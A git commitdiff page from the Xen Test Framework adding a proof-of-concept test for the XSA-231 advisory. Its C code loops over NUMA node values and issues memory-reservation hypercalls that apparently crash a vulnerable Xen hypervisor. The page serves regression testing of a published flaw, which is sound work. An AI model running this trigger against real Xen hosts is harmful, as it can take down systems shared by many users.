]> xenbits.xensource.com Git - people/andrewcoop/xen-test-framework.git/commitdiff
projects / people / andrewcoop / xen-test-framework.git / commitdiff
? search:
summary | shortlog | log | commit | commitdiff | tree
raw | patch | inline | side by side (parent: 7001ab0)
XSA-231 PoC
authorAndrew Cooper <andrew.cooper3@citrix.com>
Sun, 6 Aug 2017 10:39:51 +0000 (11:39 +0100)
committerAndrew Cooper <andrew.cooper3@citrix.com>
Mon, 25 Sep 2017 16:28:53 +0000 (17:28 +0100)
Based on an example provided by Matthew Daley.

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
docs/all-tests.dox patch | blob | blame | history
tests/xsa-231/Makefile [new file with mode: 0644] patch | blob
tests/xsa-231/main.c [new file with mode: 0644] patch | blob

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index fba9b8f1de2e87cedba990465d81a3aecd63bc23..d53935872c24d098538988d421e80b414c78c6c9 100644 (file)
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -102,6 +102,8 @@ guest breakout.
 
 @subpage test-xsa-227 - x86: PV privilege escalation via map_grant_ref.
 
+@subpage test-xsa-231 - Missing NUMA node parameter verification.
+
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-231/Makefile b/tests/xsa-231/Makefile
new file mode 100644 (file)
index 0000000..84ad33f
--- /dev/null
+++ b/tests/xsa-231/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-231
+CATEGORY  := xsa
+TEST-ENVS := pv64 hvm64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-231/main.c b/tests/xsa-231/main.c
new file mode 100644 (file)
index 0000000..2771beb
--- /dev/null
+++ b/tests/xsa-231/main.c
@@ -0,0 +1,46 @@
+/**
+ * @file tests/xsa-231/main.c
+ * @ref test-xsa-231
+ *
+ * @page test-xsa-231 XSA-231
+ *
+ * Advisory: [XSA-231](http://xenbits.xen.org/xsa/advisory-231.html)
+ *
+ * Before XSA-231, the node parameter in xen_memory_reservation was passed
+ * unaudited into the heap allocator, which ASSERT()ed it was range, then
+ * proceeded to write into an array bounded by MAX_NUMANODES.
+ *
+ * This test loops over all node values in the mem_flags field, and pokes Xen
+ * with each value.  If Xen is vulnerable, it will most likely crash.
+ *
+ * @see tests/xsa-231/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-231 PoC";
+
+void test_main(void)
+{
+    struct xen_memory_reservation res = {
+        .nr_extents = 1,
+        .domid = DOMID_SELF,
+    };
+
+    /* Opencoded loop over each value in the node field of mem_flags. */
+    for ( ; res.mem_flags < 0x10000; res.mem_flags += 0x100 )
+        hypercall_memory_op(XENMEM_increase_reservation, &res);
+
+    /* If Xen is alive at this point, it is probably not vulnerable. */
+
+    xtf_success("Success: Probably not vulnerable to XSA-231\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
Xen Test Framework - Documentation: http://xenbits.xen.org/people/andrewcoop/xen-test-framework/